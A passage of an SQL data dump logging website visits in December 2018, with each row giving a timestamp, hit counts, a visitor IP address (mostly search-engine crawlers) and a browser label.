4003495,1,1,0,0,'54.36.148.92','other'),(346427,1544003529,1,1,0,0,'8.29.198.27','other'),(346428,1544003558,1,1,0,0,'54.36.148.225','other'),(346429,1544003699,1,1,0,0,'92.113.84.76','chrome'),(346430,1544003762,1,1,0,0,'54.36.148.49','other'),(346431,1544003913,2,2,0,0,'157.55.39.129','other'),(346432,1544003950,1,1,0,0,'54.36.149.12','other'),(346433,1544004039,1,1,0,0,'5.45.207.19','other'),(346434,1544004043,2,2,0,0,'178.154.244.11','other'),(346436,1544004076,2,2,0,0,'207.46.13.89','other'),(346437,1544004385,1,1,0,0,'66.249.66.152','chrome'),(346438,1544004387,1,1,0,0,'66.249.66.156','chrome'),(346439,1544004553,1,1,0,0,'66.249.66.154','chrome'),(346440,1544005294,2,2,0,0,'193.104.213.239','msie'),(346441,1544005333,1,1,0,0,'54.36.148.245','other'),(346442,1544005460,3,3,0,0,'207.46.13.198','other'),(346443,1544005795,1,1,0,0,'54.36.148.230','other'),(346444,1544006123,1,1,0,0,'66.249.66.44','chrome'),(346445,1544006354,4,4,0,0,'207.46.13.89','other'),(346446,1544006417,1,1,0,0,'66.249.66.40','chrome'),(346447,1544006585,1,1,0,0,'54.36.148.188','other'),(346448,1544006592,1,1,0,0,'54.36.149.106','other'),(346449,1544007096,1,1,0,0,'54.36.148.86','other'),(346450,1544007098,1,1,0,0,'54.36.149.43','other'),(346451,1544007178,1,1,0,0,'66.249.66.154','chrome'),(346452,1544007438,2,2,0,0,'157.55.39.129','other'),(346453,1544007482,1,1,0,0,'94.23.58.212','other'),(346454,1544007623,2,2,0,0,'157.55.39.219','other'),(346455,1544007940,22,22,0,0,'178.154.244.29','other'),(346456,1544007971,10,10,0,0,'178.154.244.11','other'),(346457,1544008070,3,3,0,0,'5.45.207.79','other'),(346458,1544008074,2,2,0,0,'141.8.142.103','other'),(346459,1544008076,5,5,0,0,'5.45.207.19','other'),(346460,1544008231,2,2,0,0,'195.24.154.186','firefox'),(346461,1544008471,1,1,0,0,'66.249.66.59','chrome'),(346463,1544008488,1,1,0,0,'66.249.66.40','chrome'),(346464,1544008681,1,1,0,0,'54.36.148.229','other'),(346465,1544008788,1,1,0,0,'87.250.224.65','other'),(346466,1544008858,9,9,0,0,'178.154.244.29','other'),(346467,1544008864,1,1,0,0,'66.249.66.156','chrome'),(346468,1544008917,3,3,0,0,'66.249.66.154','chrome'),(346469,1544008937,2,2,0,0,'207.46.13.89','other'),(346471,1544008983,7,7,0,0,'178.154.244.11','other'),(346472,1544009136,2,2,0,0,'141.8.142.103','other'),(346473,1544009139,1,1,0,0,'66.249.66.44','chrome'),(346474,1544009160,1,1,0,0,'66.249.66.152','chrome'),(346475,1544009319,1,1,0,0,'46.229.168.144','other'),(346476,1544009324,1,1,0,0,'46.229.168.130','other'),(346477,1544009374,2,2,0,0,'207.46.13.198','other'),(346478,1544009583,2,2,0,0,'5.45.207.79','other'),(346479,1544009742,3,3,0,0,'157.55.39.129','other'),(346480,1544009779,3,3,0,0,'178.154.244.29','other'),(346481,1544010370,2,2,0,0,'178.154.244.11','other'),(346482,1544010444,1,1,0,0,'207.46.13.89','other'),(346483,1544010445,1,1,0,0,'66.249.66.156','chrome'),(346484,1544010939,2,2,0,0,'178.154.244.29','other'),(346485,1544010961,2,2,0,0,'157.55.39.129','other'),(346486,1544011453,1,1,0,0,'5.45.207.79','other'),(346487,1544011472,1,1,0,0,'66.249.66.155','chrome'),(346488,1544011521,2,2,0,0,'66.249.66.152','chrome'),(346489,1544011630,2,2,0,0,'207.46.13.198','other'),(346490,1544011974,1,1,0,0,'66.249.66.156','chrome'),(346491,1544012135,1,1,0,0,'66.249.66.157','chrome'),(346492,1544012141,1,1,0,0,'66.249.66.154','chrome'),(346493,1544012244,1,1,0,0,'54.36.148.108','other'),(346494,1544012299,1,1,0,0,'54.36.148.63','other'),(346495,1544012360,1,1,0,0,'54.36.148.239','other'),(346496,1544012372,1,1,0,0,'8.29.198.25','other'),(346497,1544012777,1,1,0,0,'157.55.39.129','other'),(346498,1544012913,1,1,0,0,'66.249.66.40','chrome'),(346499,1544013073,1,1,0,0,'66.249.66.42','chrome'),(346500,1544013083,1,1,0,0,'54.36.148.128','other'),(346501,1544013719,3,3,0,0,'91.196.178.94','chrome'),(346502,1544013921,1,1,0,0,'178.95.246.220','chrome'),(346503,1544014048,1,1,0,0,'54.36.148.76','other'),(346504,1544014119,1,1,0,0,'54.36.148.147','other'),(346505,1544014264,1,1,0,0,'54.36.149.72','other'),(346506,1544014306,2,2,0,0,'8.29.198.27','other'),(346507,1544014307,1,1,0,0,'46.229.168.129','other'),(346508,1544014424,1,1,0,0,'157.55.39.129','other'),(346509,1544014937,1,1,0,0,'66.249.66.156','chrome'),(346510,1544015128,1,1,0,0,'66.249.66.155','chrome'),(346511,1544015161,2,2,0,0,'91.196.178.39','chrome'),(346512,1544015215,1,1,0,0,'178.94.214.76','chrome'),(346513,1544015291,1,1,0,0,'66.249.66.40','chrome'),(346514,1544015568,2,2,0,0,'91.196.178.94','chrome'),(346515,1544015737,1,1,0,0,'54.36.148.69','other'),(346516,1544015866,2,2,0,0,'95.163.255.62','other'),(346517,1544015868,1,1,0,0,'95.163.255.65','other'),(346518,1544015872,1,1,0,0,'95.163.255.67','other'),(346519,1544015914,1,1,0,0,'46.229.168.153','other'),(346520,1544016830,1,1,0,0,'54.36.149.74','other'),(346521,1544016888,1,1,0,0,'46.211.69.155','chrome'),(346522,1544016954,2,2,0,0,'66.249.66.42','chrome'),(346523,1544017138,1,1,0,0,'66.249.66.152','chrome'),(346524,1544017146,1,1,0,0,'91.196.178.94','chrome'),(346525,1544017165,1,1,0,0,'54.36.149.40','other'),(346526,1544017372,1,1,0,0,'46.229.168.137','other'),(346527,1544017848,1,1,0,0,'207.46.13.89','other'),(346528,1544018087,2,2,0,0,'178.154.244.29','other'),(346529,1544018312,1,1,0,0,'54.36.148.13','other'),(346530,1544018600,1,1,0,0,'66.249.66.44','chrome'),(346531,1544018721,1,1,0,0,'46.229.168.149','other'),(346532,1544018957,1,1,0,0,'54.36.149.24','other'),(346533,1544019451,1,1,0,0,'91.124.182.170','chrome'),(346534,1544019532,1,1,0,0,'66.249.66.42','chrome'),(346535,1544019563,1,1,0,0,'46.229.168.154','other'),(346536,1544019566,1,1,0,0,'46.229.168.140','other'),(346537,1544019669,1,1,0,0,'54.36.149.22','other'),(346538,1544019687,1,1,0,0,'178.154.244.11','other'),(346539,1544019703,1,1,0,0,'178.154.244.29','other'),(346540,1544019704,2,2,0,0,'91.196.178.94','chrome'),(346541,1544020155,1,1,0,0,'207.46.13.89','other'),(346542,1544020216,1,1,0,0,'54.36.148.120','other'),(346543,1544020226,2,2,0,0,'91.242.162.38','other'),(346544,1544020310,1,1,0,0,'66.249.66.152','chrome'),(346545,1544020445,1,1,0,0,'66.249.66.154','chrome'),(346546,1544020459,1,1,0,0,'157.55.39.219','other'),(346547,1544020736,1,1,0,0,'54.36.148.58','other'),(346548,1544020966,2,2,0,0,'91.196.178.131','firefox'),(346549,1544021002,1,1,0,0,'54.36.148.107','other'),(346550,1544021007,1,1,0,0,'54.36.148.196','other'),(346551,1544021616,1,1,0,0,'46.229.168.140','other'),(346552,1544021715,1,1,0,0,'54.36.148.96','other'),(346553,1544021820,2,2,0,0,'207.46.13.89','other'),(346554,1544021831,2,2,0,0,'178.94.251.190','chrome'),(346555,1544021880,1,1,0,0,'66.249.66.156','chrome'),(346556,1544022174,1,1,0,0,'66.249.66.44','chrome'),(346557,1544022179,1,1,0,0,'54.36.149.105','other'),(346558,1544022505,1,1,0,0,'180.76.15.135','other'),(346559,1544023146,1,1,0,0,'66.249.66.154','chrome'),(346560,1544023163,2,2,0,0,'157.55.39.129','other'),(346561,1544023176,1,1,0,0,'54.36.148.36','other'),(346562,1544023222,1,1,0,0,'8.29.198.26','other'),(346563,1544023498,2,2,0,0,'146.185.146.147','chrome'),(346564,1544024180,2,2,0,0,'66.249.66.44','chrome'),(346565,1544024319,1,1,0,0,'157.55.39.219','other'),(346566,1544024774,1,1,0,0,'207.46.13.198','other'),(346567,1544024980,1,1,0,0,'66.249.66.157','chrome'),(346568,1544025005,1,1,0,0,'66.249.66.156','chrome'),(346569,1544025055,1,1,0,0,'66.249.66.155','chrome'),(346570,1544025077,2,2,0,0,'66.249.66.154','chrome'),(346571,1544025141,1,1,0,0,'8.29.198.26','other'),(346572,1544025231,1,1,0,0,'8.29.198.27','other'),(346573,1544025438,1,1,0,0,'66.249.66.152','chrome'),(346574,1544025464,1,1,0,0,'66.249.66.57','chrome'),(346575,1544025486,1,1,0,0,'66.249.66.42','chrome'),(346576,1544025546,1,1,0,0,'46.229.168.147','other'),(346577,1544025755,1,1,0,0,'46.229.168.135','other'),(346578,1544025757,1,1,0,0,'46.229.168.152','other'),(346579,1544025993,1,1,0,0,'66.249.66.44','chrome'),(346580,1544026006,1,1,0,0,'66.249.66.154','chrome'),(346581,1544026149,1,1,0,0,'54.165.59.7','other'),(346582,1544026252,1,1,0,0,'66.249.66.156','chrome'),(346583,1544026402,1,1,0,0,'46.229.168.134','other'),(346584,1544026404,1,1,0,0,'46.229.168.154','other'),(346585,1544026895,1,1,0,0,'54.36.148.164','other'),(346586,1544027202,2,2,0,0,'66.249.66.154','chrome'),(346587,1544027474,1,1,0,0,'54.36.149.26','other'),(346588,1544027680,1,1,0,0,'91.196.178.180','chrome'),(346589,1544027726,1,1,0,0,'5.45.207.79','other'),(346590,1544027820,2,2,0,0,'66.249.66.152','chrome'),(346591,1544027931,3,3,0,0,'178.154.244.11','other'),(346592,1544028201,2,2,0,0,'91.196.178.177','chrome'),(346593,1544028254,1,1,0,0,'54.165.59.7','other'),(346594,1544028346,1,1,0,0,'54.36.148.111','other'),(346595,1544028451,6,6,0,0,'178.154.244.29','other'),(346596,1544028541,1,1,0,0,'95.163.255.98','other'),(346597,1544028594,1,1,0,0,'157.55.39.129','other'),(346598,1544028601,2,2,0,0,'66.249.66.42','chrome'),(346599,1544028705,3,3,0,0,'66.249.66.156','chrome'),(346600,1544028727,1,1,0,0,'207.46.13.89','other'),(346601,1544028975,1,1,0,0,'95.108.213.4','other'),(346602,1544029385,9,9,0,0,'178.154.244.29','other'),(346603,1544029759,1,1,0,0,'54.165.59.7','other'),(346604,1544029773,2,2,0,0,'91.196.178.136','firefox'),(346605,1544029857,1,1,0,0,'87.250.224.47','other'),(346606,1544029867,2,2,0,0,'178.154.244.11','other'),(346607,1544030380,6,6,0,0,'178.154.244.29','other'),(346608,1544030538,1,1,0,0,'46.229.168.137','other'),(346609,1544030919,2,2,0,0,'195.10.210.49','chrome'),(346610,1544031014,1,1,0,0,'207.46.13.198','other'),(346611,1544031171,1,1,0,0,'66.249.66.61','chrome'),(346612,1544031173,1,1,0,0,'66.249.66.156','chrome'),(346613,1544031190,1,1,0,0,'66.249.66.40','chrome'),(346614,1544031269,1,1,0,0,'5.45.207.79','other'),(346615,1544031358,2,2,0,0,'91.196.178.162','chrome'),(346616,1544031375,2,2,0,0,'178.154.244.11','other'),(346617,1544031427,5,5,0,0,'178.154.244.29','other'),(346618,1544031733,1,1,0,0,'54.36.149.43','other'),(346619,1544031781,1,1,0,0,'66.249.66.154','chrome'),(346620,1544032016,1,1,0,0,'37.9.113.148','other'),(346621,1544032017,1,1,0,0,'54.36.148.181','other'),(346622,1544032322,2,2,0,0,'178.154.244.11','other'),(346623,1544032383,1,1,0,0,'54.36.149.92','other'),(346624,1544032548,5,5,0,0,'178.154.244.29','other'),(346625,1544032717,1,1,0,0,'54.36.149.33','other'),(346626,1544032732,1,1,0,0,'66.249.66.152','chrome'),(346627,1544032808,4,4,0,0,'5.45.207.79','other'),(346628,1544033128,1,1,0,0,'207.46.13.198','other'),(346629,1544033310,1,1,0,0,'87.250.224.47','other'),(346631,1544033315,3,3,0,0,'66.249.66.156','chrome'),(346632,1544033347,1,1,0,0,'54.36.148.180','other'),(346633,1544033358,5,5,0,0,'178.154.244.11','other'),(346634,1544033499,1,1,0,0,'54.36.149.16','other'),(346635,1544033580,1,1,0,0,'54.36.148.96','other'),(346636,1544033682,14,14,0,0,'178.154.244.29','other'),(346637,1544033812,4,4,0,0,'5.45.207.79','other'),(346638,1544033965,2,2,0,0,'66.249.66.152','chrome'),(346639,1544034055,1,1,0,0,'8.29.198.27','other'),(346640,1544034085,1,1,0,0,'54.36.149.52','other'),(346641,1544034112,1,1,0,0,'54.36.148.107','other'),(346642,1544034160,1,1,0,0,'46.229.168.148','other'),(346643,1544034161,1,1,0,0,'46.229.168.132','other'),(346644,1544034251,1,1,0,0,'87.250.224.47','other'),(346645,1544034469,1,1,0,0,'5.45.207.19','other'),(346646,1544034478,1,1,0,0,'95.108.213.4','other'),(346647,1544034521,5,5,0,0,'178.154.244.11','other'),(346648,1544034609,1,1,0,0,'54.36.148.126','other'),(346649,1544034742,2,2,0,0,'46.211.131.143','chrome'),(346650,1544034825,1,1,0,0,'5.45.207.79','other'),(346651,1544034899,1,1,0,0,'141.8.142.103','other'),(346652,1544034985,1,1,0,0,'178.154.244.29','other'),(346653,1544035571,1,1,0,0,'54.36.148.56','other'),(346654,1544035580,1,1,0,0,'91.196.178.180','chrome'),(346655,1544035585,1,1,0,0,'66.249.66.152','chrome'),(346656,1544035732,1,1,0,0,'46.229.168.134','other'),(346657,1544035734,1,1,0,0,'46.229.168.139','other'),(346658,1544035943,1,1,0,0,'54.36.148.17','other'),(346659,1544035977,2,2,0,0,'8.29.198.27','other'),(346660,1544036160,2,2,0,0,'178.154.244.29','other'),(346661,1544036227,1,1,0,0,'54.36.148.183','other'),(346662,1544036582,1,1,0,0,'91.196.178.180','chrome'),(346663,1544036871,1,1,0,0,'54.36.148.144','other'),(346664,1544037866,2,2,0,0,'178.154.244.11','other'),(346665,1544037964,1,1,0,0,'5.58.110.79','msie'),(346666,1544038161,1,1,0,0,'66.249.66.44','chrome'),(346667,1544038225,1,1,0,0,'66.249.66.152','chrome'),(346668,1544038395,1,1,0,0,'188.163.18.252','chrome'),(346669,1544038432,1,1,0,0,'54.208.102.37','other'),(346670,1544038434,1,1,0,0,'107.21.1.8','other'),(346671,1544038459,1,1,0,0,'207.46.13.89','other'),(346672,1544038962,3,3,0,0,'178.154.244.29','other'),(346673,1544038995,1,1,0,0,'54.36.148.52','other'),(346674,1544039302,1,1,0,0,'54.36.148.179','other'),(346675,1544039578,1,1,0,0,'66.249.66.156','chrome'),(346676,1544039592,1,1,0,0,'66.249.66.157','chrome'),(346677,1544039598,6,6,0,0,'66.249.66.152','chrome'),(346678,1544039610,1,1,0,0,'66.249.66.44','chrome'),(346679,1544039667,3,3,0,0,'66.249.66.40','chrome'),(346680,1544039794,1,1,0,0,'46.229.168.133','other'),(346681,1544039983,2,2,0,0,'66.249.66.42','chrome'),(346682,1544040582,1,1,0,0,'66.249.66.154','chrome'),(346683,1544040586,1,1,0,0,'66.249.66.40','chrome'),(346684,1544040618,1,1,0,0,'66.249.66.152','chrome'),(346685,1544040654,2,2,0,0,'207.46.13.89','other'),(346686,1544040889,1,1,0,0,'54.36.149.88','other'),(346687,1544040910,1,1,0,0,'157.55.39.129','other'),(346688,1544040915,1,1,0,0,'46.229.168.152','other'),(346689,1544041330,1,1,0,0,'54.36.148.113','other'),(346690,1544041435,1,1,0,0,'66.249.66.42','chrome'),(346691,1544041493,1,1,0,0,'66.249.66.40','chrome'),(346692,1544041513,1,1,0,0,'66.249.66.44','chrome'),(346693,1544041913,1,1,0,0,'54.36.148.129','other'),(346694,1544041986,1,1,0,0,'54.36.148.90','other'),(346695,1544042244,1,1,0,0,'66.249.66.152','chrome'),(346696,1544042745,1,1,0,0,'95.163.255.109','other'),(346697,1544042890,1,1,0,0,'95.163.255.112','other'),(346698,1544042958,1,1,0,0,'95.163.255.104','other'),(346699,1544042998,1,1,0,0,'95.163.255.116','other'),(346700,1544043029,2,2,0,0,'95.163.255.108','other'),(346701,1544043077,1,1,0,0,'157.55.39.129','other'),(346702,1544043181,1,1,0,0,'54.36.149.37','other'),(346703,1544043333,1,1,0,0,'66.249.66.40','chrome'),(346704,1544043367,1,1,0,0,'66.249.66.42','chrome'),(346705,1544043398,1,1,0,0,'54.36.149.19','other'),(346706,1544043575,1,1,0,0,'178.154.244.29','other'),(346707,1544043605,1,1,0,0,'54.36.149.28','other'),(346708,1544043620,1,1,0,0,'66.249.66.44','chrome'),(346709,1544044141,2,2,0,0,'91.209.11.236','other'),(346710,1544044252,1,1,0,0,'207.46.13.89','other'),(346711,1544044340,1,1,0,0,'46.229.168.137','other'),(346712,1544044342,1,1,0,0,'46.229.168.129','other'),(346713,1544044485,1,1,0,0,'157.55.39.129','other'),(346714,1544044592,2,2,0,0,'95.163.255.108','other'),(346715,1544044619,1,1,0,0,'95.163.255.107','other'),(346716,1544044671,1,1,0,0,'95.163.255.112','other'),(346717,1544044697,2,2,0,0,'95.163.255.115','other'),(346718,1544044724,3,3,0,0,'95.163.255.102','other'),(346719,1544044824,1,1,0,0,'95.163.255.104','other'),(346720,1544044908,1,1,0,0,'8.29.198.26','other'),(346721,1544044967,28,28,0,0,'178.154.244.29','other'),(346722,1544044971,11,11,0,0,'178.154.244.11','other'),(346723,1544044979,4,4,0,0,'5.45.207.79','other'),(346724,1544045388,2,2,0,0,'87.250.224.47','other'),(346725,1544045442,1,1,0,0,'207.46.13.89','other'),(346726,1544045527,1,1,0,0,'141.8.142.103','other'),(346727,1544045709,1,1,0,0,'66.249.66.40','chrome'),(346728,1544045818,3,3,0,0,'95.108.213.4','other'),(346729,1544045819,2,2,0,0,'66.249.66.156','chrome'),(346730,1544045887,15,15,0,0,'178.154.244.11','other'),(346731,1544045893,1,1,0,0,'66.249.66.44','chrome'),(346732,1544045917,1,1,0,0,'66.249.66.154','chrome'),(346733,1544045922,2,2,0,0,'66.249.66.152','chrome'),(346734,1544045930,1,1,0,0,'66.249.66.155','chrome'),(346735,1544045972,19,19,0,0,'178.154.244.29','other'),(346736,1544045973,2,2,0,0,'37.9.113.103','other'),(346737,1544045991,2,2,0,0,'5.45.207.79','other'),(346738,1544046163,1,1,0,0,'5.45.207.19','other'),(346739,1544046452,1,1,0,0,'95.163.255.113','other'),(346740,1544046458,1,1,0,0,'95.163.255.109','other'),(346741,1544046470,1,1,0,0,'95.163.255.117','other'),(346742,1544046479,1,1,0,0,'95.163.255.105','other'),(346743,1544046484,1,1,0,0,'213.180.203.9','other'),(346744,1544046520,2,2,0,0,'157.55.39.129','other'),(346745,1544046522,1,1,0,0,'87.250.224.65','other'),(346746,1544046807,1,1,0,0,'8.29.198.27','other'),(346747,1544046905,2,2,0,0,'178.154.244.11','other'),(346748,1544046931,1,1,0,0,'8.29.198.25','other'),(346749,1544047439,3,3,0,0,'178.154.244.29','other'),(346750,1544048005,3,3,0,0,'178.154.244.11','other'),(346751,1544048536,1,1,0,0,'66.249.66.42','chrome'),(346752,1544048661,1,1,0,0,'54.36.148.197','other'),(346753,1544049019,1,1,0,0,'66.249.66.154','chrome'),(346754,1544049182,1,1,0,0,'54.36.148.241','other'),(346755,1544049343,1,1,0,0,'46.229.168.146','other'),(346756,1544049346,2,2,0,0,'46.229.168.133','other'),(346757,1544049456,1,1,0,0,'46.229.168.148','other'),(346758,1544049552,1,1,0,0,'157.55.39.129','other'),(346759,1544049969,1,1,0,0,'46.229.168.154','other'),(346760,1544050199,2,2,0,0,'66.249.84.96','other'),(346761,1544050209,2,2,0,0,'66.249.83.218','other'),(346762,1544050218,1,1,0,0,'66.102.8.186','other'),(346765,1544050221,3,3,0,0,'66.102.8.168','other'),(346766,1544050225,2,2,0,0,'66.102.6.145','chrome'),(346767,1544050226,5,5,0,0,'66.102.6.149','other'),(346768,1544050227,3,3,0,0,'66.102.6.149','chrome'),(346769,1544050266,2,2,0,0,'66.102.6.144','chrome'),(346770,1544050267,7,7,0,0,'66.102.6.150','chrome'),(346771,1544050284,3,3,0,0,'66.102.6.148','chrome'),(346772,1544050346,1,1,0,0,'66.102.8.190','chrome'),(346773,1544050358,3,3,0,0,'66.102.6.148','other'),(346774,1544050360,3,3,0,0,'66.249.83.220','chrome'),(346775,1544050381,1,1,0,0,'66.249.83.221','chrome'),(346777,1544050390,2,2,0,0,'66.102.8.188','chrome'),(346778,1544050400,2,2,0,0,'66.102.6.8','other'),(346779,1544050437,1,1,0,0,'66.249.84.12','other'),(346780,1544050444,2,2,0,0,'66.249.84.114','chrome'),(346782,1544050468,1,1,0,0,'66.249.84.126','other'),(346783,1544050477,1,1,0,0,'66.102.6.8','chrome'),(346784,1544050535,1,1,0,0,'54.36.148.191','other'),(346785,1544050567,1,1,0,0,'66.102.8.168','chrome'),(346786,1544050596,4,4,0,0,'66.249.84.126','chrome'),(346787,1544050633,1,1,0,0,'66.102.8.190','other'),(346788,1544050718,1,1,0,0,'66.249.83.216','other'),(346789,1544050726,1,1,0,0,'66.249.83.59','chrome'),(346790,1544050727,1,1,0,0,'66.249.83.42','chrome'),(346791,1544050729,1,1,0,0,'66.102.8.170','other'),(346792,1544050738,1,1,0,0,'66.102.8.163','chrome'),(346793,1544050740,1,1,0,0,'66.102.6.150','other'),(346794,1544050741,1,1,0,0,'66.249.84.116','chrome'),(346795,1544050742,1,1,0,0,'66.249.84.96','chrome'),(346796,1544050878,1,1,0,0,'180.76.15.141','other'),(346797,1544051249,1,1,0,0,'5.58.222.37','opera'),(346798,1544051417,2,2,0,0,'66.249.66.156','chrome'),(346799,1544051436,1,1,0,0,'66.249.66.154','chrome'),(346800,1544051665,1,1,0,0,'46.229.168.137','other'),(346801,1544052178,1,1,0,0,'157.55.39.129','other'),(346802,1544052578,1,1,0,0,'176.120.99.199','firefox'),(346803,1544052933,2,2,0,0,'66.249.66.40','chrome'),(346804,1544053088,1,1,0,0,'66.249.66.154','chrome'),(346805,1544053498,1,1,0,0,'46.229.168.129','other'),(346806,1544053500,1,1,0,0,'46.229.168.147','other'),(346807,1544053518,1,1,0,0,'66.249.66.156','chrome'),(346808,1544054265,1,1,0,0,'66.249.66.157','chrome'),(346809,1544054634,1,1,0,0,'54.36.149.100','other'),(346810,1544054789,1,1,0,0,'66.249.66.40','chrome'),(346811,1544054985,1,1,0,0,'66.249.66.59','chrome'),(346812,1544054997,2,2,0,0,'66.249.66.42','chrome'),(346813,1544055005,2,2,0,0,'66.249.66.152','chrome'),(346814,1544055360,1,1,0,0,'207.46.13.89','other'),(346815,1544055458,1,1,0,0,'54.36.148.152','other'),(346816,1544055476,1,1,0,0,'54.36.149.107','other'),(346817,1544055739,1,1,0,0,'8.29.198.26','other'),(346818,1544055856,1,1,0,0,'54.36.149.10','other'),(346819,1544056159,1,1,0,0,'54.36.148.241','other'),(346820,1544056262,1,1,0,0,'54.36.148.128','other'),(346821,1544056867,1,1,0,0,'157.55.39.129','other'),(346822,1544056932,1,1,0,0,'66.249.66.42','chrome'),(346823,1544057034,2,1,1,0,'66.249.66.44',''),(346824,1544057037,3,3,0,0,'66.249.66.152','chrome'),(346825,1544057138,1,1,0,0,'66.249.66.154','chrome'),(346826,1544057637,1,1,0,0,'8.29.198.26','other'),(346827,1544057725,1,1,0,0,'80.241.214.102','other'),(346828,1544057775,1,1,0,0,'8.29.198.25','other'),(346829,1544057966,1,1,0,0,'207.46.13.198','other'),(346830,1544058499,1,1,0,0,'46.229.168.150','other'),(346831,1544059044,1,1,0,0,'157.55.39.129','other'),(346832,1544059164,1,1,0,0,'66.249.66.40','chrome'),(346833,1544060147,2,2,0,0,'66.249.66.156','chrome'),(346834,1544060152,1,1,0,0,'66.249.66.44','chrome'),(346835,1544060182,1,1,0,0,'66.249.66.157','chrome'),(346836,1544060222,1,1,0,0,'66.249.66.154','chrome'),(346837,1544060400,1,1,0,0,'54.36.148.219','other'),(346838,1544060406,3,3,0,0,'178.154.244.11','other'),(346839,1544060411,9,9,0,0,'178.154.244.29','other'),(346840,1544060603,1,1,0,0,'54.36.148.16','other'),(346841,1544060632,2,2,0,0,'5.45.207.79','other'),(346842,1544061083,1,1,0,0,'66.249.66.156','chrome'),(346843,1544061249,1,1,0,0,'54.36.148.15','other'),(346844,1544061345,9,9,0,0,'178.154.244.29','other'),(346845,1544061511,1,1,0,0,'66.249.66.42','chrome'),(346846,1544061541,1,1,0,0,'5.45.207.19','other'),(346847,1544061543,1,1,0,0,'66.249.66.154','chrome'),(346848,1544061639,5,5,0,0,'178.154.244.11','other'),(346849,1544061846,1,1,0,0,'54.36.148.173','other'),(346850,1544062025,1,1,0,0,'54.36.148.182','other'),(346851,1544062030,2,2,0,0,'5.45.207.79','other'),(346852,1544062455,1,1,0,0,'54.36.149.68','other'),(346853,1544062562,2,2,0,0,'178.154.244.11','other'),(346854,1544062943,1,1,0,0,'207.46.13.198','other'),(346855,1544063001,1,1,0,0,'178.154.244.29','other'),(346856,1544063137,1,1,0,0,'199.16.157.182','other'),(346857,1544063482,5,5,0,0,'69.30.198.186','other'),(346858,1544064177,1,1,0,0,'46.118.126.87','chrome'),(346859,1544064434,1,1,0,0,'66.249.66.152','chrome'),(346860,1544064604,2,2,0,0,'157.55.39.219','other'),(346861,1544064718,122,122,0,0,'5.9.70.113','other'),(346862,1544064731,1,1,0,0,'95.108.213.4','other'),(346863,1544064734,2,2,0,0,'178.154.244.11','other'),(346864,1544064736,1,1,0,0,'178.154.244.29','other'),(346865,1544064783,1,1,0,0,'54.36.149.33','other'),(346866,1544064811,1,1,0,0,'54.36.148.243','other'),(346867,1544064946,1,1,0,0,'66.249.66.156','chrome'),(346868,1544065001,1,1,0,0,'66.249.66.40','chrome'),(346869,1544065519,1,1,0,0,'66.249.66.154','chrome'),(346870,1544066373,1,1,0,0,'54.36.148.57','other'),(346871,1544066578,1,1,0,0,'8.29.198.26','other'),(346872,1544066930,1,1,0,0,'66.249.66.61','chrome'),(346873,1544067085,1,1,0,0,'66.249.66.42','chrome'),(346874,1544067189,1,1,0,0,'46.229.168.151','other'),(346875,1544067190,1,1,0,0,'46.229.168.146','other'),(346876,1544067245,1,1,0,0,'157.55.39.129','other'),(346877,1544067319,1,1,0,0,'207.46.13.89','other'),(346878,1544067388,1,1,0,0,'66.249.66.156','chrome'),(346879,1544067705,1,1,0,0,'51.255.65.46','other'),(346880,1544068189,1,1,0,0,'54.36.149.63','other'),(346881,1544068480,1,1,0,0,'8.29.198.25','other'),(346882,1544068619,1,1,0,0,'8.29.198.26','other'),(346883,1544068712,1,1,0,0,'54.36.148.37','other'),(346884,1544069917,1,1,0,0,'46.229.168.140','other'),(346885,1544070034,1,1,0,0,'54.36.148.53','other'),(346886,1544070100,1,1,0,0,'54.36.148.77','other'),(346887,1544070645,1,1,0,0,'66.249.66.157','chrome'),(346888,1544070685,1,1,0,0,'66.249.66.156','chrome'),(346889,1544070778,1,1,0,0,'66.249.66.155','chrome'),(346890,1544070806,1,1,0,0,'66.249.66.152','chrome'),(346891,1544071134,1,1,0,0,'54.36.148.128','other'),(346892,1544071148,2,2,0,0,'66.249.66.154','chrome'),(346893,1544071354,1,1,0,0,'54.36.148.121','other'),(346894,1544071370,1,1,0,0,'54.36.148.134','other'),(346895,1544072003,1,1,0,0,'54.36.148.225','other'),(346896,1544072231,1,1,0,0,'66.249.66.44','chrome'),(346897,1544072715,1,1,0,0,'54.36.148.229','other'),(346898,1544072725,1,1,0,0,'46.229.168.141','other'),(346899,1544072841,1,1,0,0,'66.249.66.155','chrome'),(346900,1544072860,3,3,0,0,'66.249.66.154','chrome'),(346901,1544073170,1,1,0,0,'141.8.142.38','other'),(346902,1544073206,4,4,0,0,'87.250.224.99','other'),(346903,1544073234,3,3,0,0,'87.250.224.65','other'),(346904,1544073292,3,3,0,0,'178.154.200.8','other'),(346905,1544073332,3,3,0,0,'141.8.183.23','other'),(346906,1544073390,1,1,0,0,'178.154.171.27','other'),(346907,1544073440,2,2,0,0,'178.154.171.24','other'),(346908,1544073454,3,3,0,0,'87.250.224.107','other'),(346909,1544073629,1,1,0,0,'66.249.66.152','chrome'),(346910,1544073637,1,1,0,0,'5.45.207.79','other'),(346911,1544073638,1,1,0,0,'66.249.66.42','chrome'),(346912,1544073650,1,1,0,0,'87.250.224.47','other'),(346913,1544073656,2,2,0,0,'66.249.66.40','chrome'),(346914,1544073673,1,1,0,0,'5.255.253.38','other'),(346915,1544073698,1,1,0,0,'141.8.142.162','other'),(346916,1544073806,4,4,0,0,'37.9.113.103','other'),(346917,1544073830,1,1,0,0,'141.8.132.16','other'),(346918,1544073921,4,4,0,0,'95.108.213.4','other'),(346919,1544073933,3,3,0,0,'213.180.203.17','other'),(346920,1544073988,1,1,0,0,'178.154.244.65','other'),(346921,1544074036,2,2,0,0,'178.154.244.11','other'),(346922,1544074151,1,1,0,0,'141.8.142.144','other'),(346923,1544074153,2,2,0,0,'87.250.224.99','other'),(346924,1544074169,1,1,0,0,'46.229.168.148','other'),(346925,1544074209,1,1,0,0,'87.250.224.118','other'),(346926,1544074210,1,1,0,0,'95.163.255.95','other'),(346927,1544074214,1,1,0,0,'95.163.255.93','other'),(346928,1544074275,2,2,0,0,'178.154.200.8','other'),(346929,1544074281,1,1,0,0,'5.45.207.19','other'),(346930,1544074325,4,4,0,0,'37.9.113.20','other'),(346931,1544074368,1,1,0,0,'66.249.66.61','chrome'),(346932,1544074415,2,2,0,0,'141.8.142.108','other'),(346933,1544074436,1,1,0,0,'5.255.253.22','other'),(346934,1544074496,1,1,0,0,'141.8.183.23','other'),(346935,1544074655,1,1,0,0,'54.36.148.75','other'),(346936,1544074657,1,1,0,0,'87.250.224.65','other'),(346937,1544074681,1,1,0,0,'87.250.224.64','other'),(346938,1544074700,1,1,0,0,'5.45.207.79','other'),(346939,1544074725,1,1,0,0,'178.154.244.49','other'),(